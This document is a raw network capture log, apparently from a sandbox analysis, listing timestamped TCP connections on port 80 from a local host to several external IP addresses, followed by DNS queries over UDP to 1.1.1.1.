Sep 26, 2024 14:25:38.484329939 CEST	49769	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:38.495322943 CEST	49769	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:38.500330925 CEST	80	49769	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:38.951858997 CEST	80	49769	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:38.951920986 CEST	49769	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:40.007144928 CEST	49769	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:40.012383938 CEST	80	49769	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.028037071 CEST	49770	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:41.033175945 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.033263922 CEST	49770	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:41.049168110 CEST	49770	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:41.054054022 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054158926 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054187059 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054217100 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054243088 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054359913 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054385900 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054444075 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.054490089 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.542927980 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:41.543185949 CEST	49770	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:42.553273916 CEST	49770	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:42.559654951 CEST	80	49770	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:43.571950912 CEST	49771	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:43.577199936 CEST	80	49771	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:43.577326059 CEST	49771	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:43.587124109 CEST	49771	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:43.592363119 CEST	80	49771	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:44.963043928 CEST	80	49771	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:44.963633060 CEST	80	49771	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:44.963690042 CEST	49771	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:44.965993881 CEST	49771	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:44.970936060 CEST	80	49771	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:59.736891985 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:25:59.741956949 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:25:59.742111921 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:25:59.752891064 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:25:59.757842064 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251149893 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251202106 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251231909 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251265049 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251296997 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251327991 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251348972 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.251360893 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251501083 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251533985 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251549959 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.251564980 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.251597881 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.251674891 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.256498098 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.256542921 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.256542921 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.256567001 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.256592035 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.256623983 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.256628990 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.256659031 CEST	80	49772	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:01.256712914 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:01.256712914 CEST	49772	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:02.275562048 CEST	49773	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:02.280778885 CEST	80	49773	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:02.280848980 CEST	49773	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:02.291403055 CEST	49773	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:02.296405077 CEST	80	49773	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:03.804896116 CEST	49773	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:03.810208082 CEST	80	49773	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:03.810305119 CEST	49773	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:04.822186947 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:04.827163935 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.827274084 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:04.838612080 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:04.843827963 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.843858004 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.843889952 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.843935013 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.843961000 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.844007969 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.844033957 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.844059944 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:04.844127893 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.334909916 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335014105 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335067034 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335067034 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:06.335099936 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335133076 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335158110 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:06.335165024 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335197926 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335208893 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:06.335231066 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335262060 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335269928 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:06.335294962 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.335334063 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:06.340482950 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.340560913 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.340595007 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.340605974 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:06.340630054 CEST	80	49774	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:06.340677977 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:06.350164890 CEST	49774	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:07.368613005 CEST	49775	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:07.373814106 CEST	80	49775	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:07.373954058 CEST	49775	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:07.380870104 CEST	49775	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:07.385806084 CEST	80	49775	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:08.794763088 CEST	80	49775	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:08.794960976 CEST	80	49775	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:08.795017004 CEST	49775	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:08.797278881 CEST	49775	80	192.168.2.4	221.121.144.149
Sep 26, 2024 14:26:08.802328110 CEST	80	49775	221.121.144.149	192.168.2.4
Sep 26, 2024 14:26:13.935832977 CEST	49776	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:13.941272974 CEST	80	49776	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:13.941625118 CEST	49776	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:13.952896118 CEST	49776	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:13.960248947 CEST	80	49776	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:15.460907936 CEST	49776	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:15.466996908 CEST	80	49776	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:15.467075109 CEST	49776	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:16.478643894 CEST	49777	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:16.483620882 CEST	80	49777	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:16.483716011 CEST	49777	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:16.497605085 CEST	49777	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:16.502481937 CEST	80	49777	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:18.007843018 CEST	49777	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:18.013684988 CEST	80	49777	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:18.017016888 CEST	49777	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:19.025448084 CEST	49778	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:19.030642033 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.030733109 CEST	49778	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:19.043593884 CEST	49778	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:19.048599958 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048671007 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048698902 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048747063 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048774958 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048803091 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048849106 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048876047 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:19.048902988 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:20.553750992 CEST	49778	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:20.565674067 CEST	80	49778	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:20.565740108 CEST	49778	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:21.572236061 CEST	49779	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:21.578558922 CEST	80	49779	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:21.578665972 CEST	49779	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:21.585375071 CEST	49779	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:21.590234995 CEST	80	49779	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:22.261334896 CEST	80	49779	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:22.261394024 CEST	80	49779	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:22.261486053 CEST	49779	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:22.264067888 CEST	49779	80	192.168.2.4	85.159.66.93
Sep 26, 2024 14:26:22.268937111 CEST	80	49779	85.159.66.93	192.168.2.4
Sep 26, 2024 14:26:27.295181990 CEST	49780	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:27.300040960 CEST	80	49780	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:27.301116943 CEST	49780	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:27.312942028 CEST	49780	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:27.317828894 CEST	80	49780	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:27.903109074 CEST	80	49780	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:27.903321981 CEST	80	49780	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:27.903412104 CEST	49780	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:28.819031954 CEST	49780	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:29.837228060 CEST	49781	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:29.843832970 CEST	80	49781	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:29.843941927 CEST	49781	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:29.853851080 CEST	49781	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:29.858735085 CEST	80	49781	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:30.439476013 CEST	80	49781	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:30.440377951 CEST	80	49781	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:30.440458059 CEST	49781	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:31.368989944 CEST	49781	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:32.398844004 CEST	49782	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:32.404467106 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.404675007 CEST	49782	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:32.420094013 CEST	49782	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:32.425144911 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425177097 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425204992 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425414085 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425441980 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425468922 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425590992 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425623894 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:32.425651073 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:33.156708956 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:33.157717943 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:33.157747030 CEST	80	49782	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:33.157804966 CEST	49782	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:33.157804966 CEST	49782	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:33.928603888 CEST	49782	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:34.947308064 CEST	49783	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:34.952502966 CEST	80	49783	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:34.952569008 CEST	49783	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:34.959969997 CEST	49783	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:34.964847088 CEST	80	49783	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:35.573121071 CEST	80	49783	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:35.573440075 CEST	80	49783	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:35.577429056 CEST	49783	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:35.578046083 CEST	49783	80	192.168.2.4	50.3.111.89
Sep 26, 2024 14:26:35.582835913 CEST	80	49783	50.3.111.89	192.168.2.4
Sep 26, 2024 14:26:48.704972029 CEST	49784	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:48.709934950 CEST	80	49784	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:48.710006952 CEST	49784	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:48.719868898 CEST	49784	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:48.725425959 CEST	80	49784	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:49.171536922 CEST	80	49784	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:49.171590090 CEST	49784	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:50.225280046 CEST	49784	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:50.230494022 CEST	80	49784	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:51.244999886 CEST	49785	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:51.250164986 CEST	80	49785	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:51.253062963 CEST	49785	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:51.264977932 CEST	49785	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:51.269982100 CEST	80	49785	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:51.717956066 CEST	80	49785	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:51.721081018 CEST	49785	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:52.772160053 CEST	49785	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:52.777326107 CEST	80	49785	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.790926933 CEST	49786	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:53.795845985 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.795948982 CEST	49786	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:53.809027910 CEST	49786	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:53.814003944 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814110994 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814152002 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814213991 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814254045 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814306974 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814347982 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814385891 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:53.814412117 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:55.212080956 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:55.212162018 CEST	49786	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:55.319067001 CEST	49786	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:55.324023008 CEST	80	49786	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:56.338197947 CEST	49787	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:56.344553947 CEST	80	49787	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:56.344630003 CEST	49787	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:56.352355957 CEST	49787	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:56.358931065 CEST	80	49787	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:56.802359104 CEST	80	49787	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:56.802577972 CEST	80	49787	3.33.130.190	192.168.2.4
Sep 26, 2024 14:26:56.802702904 CEST	49787	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:56.805177927 CEST	49787	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:26:56.810193062 CEST	80	49787	3.33.130.190	192.168.2.4
Sep 26, 2024 14:27:01.839076042 CEST	49788	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:01.844054937 CEST	80	49788	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:01.845062017 CEST	49788	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:01.856981039 CEST	49788	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:01.862065077 CEST	80	49788	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:02.405929089 CEST	80	49788	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:02.406008005 CEST	80	49788	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:02.406052113 CEST	49788	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:03.369033098 CEST	49788	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:04.384778976 CEST	49789	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:04.389874935 CEST	80	49789	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:04.389957905 CEST	49789	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:04.400778055 CEST	49789	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:04.405615091 CEST	80	49789	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:04.958197117 CEST	80	49789	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:04.958416939 CEST	80	49789	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:04.958470106 CEST	49789	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:05.912813902 CEST	49789	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:06.931827068 CEST	49790	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:06.939415932 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.939486980 CEST	49790	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:06.952435017 CEST	49790	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:06.959367990 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.959444046 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.959506035 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.959544897 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.959583044 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.961582899 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.961642981 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.961682081 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:06.961719036 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:07.503957987 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:07.505244017 CEST	80	49790	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:07.509052992 CEST	49790	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:08.459882975 CEST	49790	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:09.775105953 CEST	49791	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:09.781255960 CEST	80	49791	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:09.784003973 CEST	49791	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:09.789627075 CEST	49791	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:09.794564009 CEST	80	49791	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:10.353351116 CEST	80	49791	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:10.353533030 CEST	80	49791	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:10.357134104 CEST	49791	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:10.361156940 CEST	49791	80	192.168.2.4	13.248.252.114
Sep 26, 2024 14:27:10.366067886 CEST	80	49791	13.248.252.114	192.168.2.4
Sep 26, 2024 14:27:18.448851109 CEST	49792	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:27:18.454005003 CEST	80	49792	147.92.40.174	192.168.2.4
Sep 26, 2024 14:27:18.454096079 CEST	49792	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:27:18.461025000 CEST	49792	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:27:18.466099024 CEST	80	49792	147.92.40.174	192.168.2.4
Sep 26, 2024 14:27:19.547317028 CEST	80	49792	147.92.40.174	192.168.2.4
Sep 26, 2024 14:27:19.547987938 CEST	80	49792	147.92.40.174	192.168.2.4
Sep 26, 2024 14:27:19.549092054 CEST	49792	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:27:19.550028086 CEST	49792	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:27:19.557687044 CEST	80	49792	147.92.40.174	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 14:23:49.253144026 CEST	52305	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:23:49.281284094 CEST	53	52305	1.1.1.1	192.168.2.4
Sep 26, 2024 14:24:05.433195114 CEST	50738	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:24:05.446938038 CEST	53	50738	1.1.1.1	192.168.2.4
Sep 26, 2024 14:24:13.510858059 CEST	50639	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:24:14.099090099 CEST	53	50639	1.1.1.1	192.168.2.4
Sep 26, 2024 14:24:27.823844910 CEST	63373	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:24:27.846785069 CEST	53	63373	1.1.1.1	192.168.2.4
Sep 26, 2024 14:24:41.025011063 CEST	60061	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:24:41.037054062 CEST	53	60061	1.1.1.1	192.168.2.4
Sep 26, 2024 14:24:55.088186979 CEST	56007	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:24:55.116763115 CEST	53	56007	1.1.1.1	192.168.2.4
Sep 26, 2024 14:25:08.275425911 CEST	55292	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:25:08.308176994 CEST	53	55292	1.1.1.1	192.168.2.4
Sep 26, 2024 14:25:21.432838917 CEST	64649	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:25:22.246493101 CEST	53	64649	1.1.1.1	192.168.2.4
Sep 26, 2024 14:25:35.916846991 CEST	62123	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:25:35.929969072 CEST	53	62123	1.1.1.1	192.168.2.4
Sep 26, 2024 14:25:49.978952885 CEST	59271	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:25:50.383591890 CEST	53	59271	1.1.1.1	192.168.2.4
Sep 26, 2024 14:25:58.448014975 CEST	57278	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:25:59.444051027 CEST	57278	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:25:59.732269049 CEST	53	57278	1.1.1.1	192.168.2.4
Sep 26, 2024 14:25:59.732335091 CEST	53	57278	1.1.1.1	192.168.2.4
Sep 26, 2024 14:26:13.806335926 CEST	53440	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:26:13.933239937 CEST	53	53440	1.1.1.1	192.168.2.4
Sep 26, 2024 14:26:27.276947021 CEST	57218	53	192.168.2.4	1.1.1.1
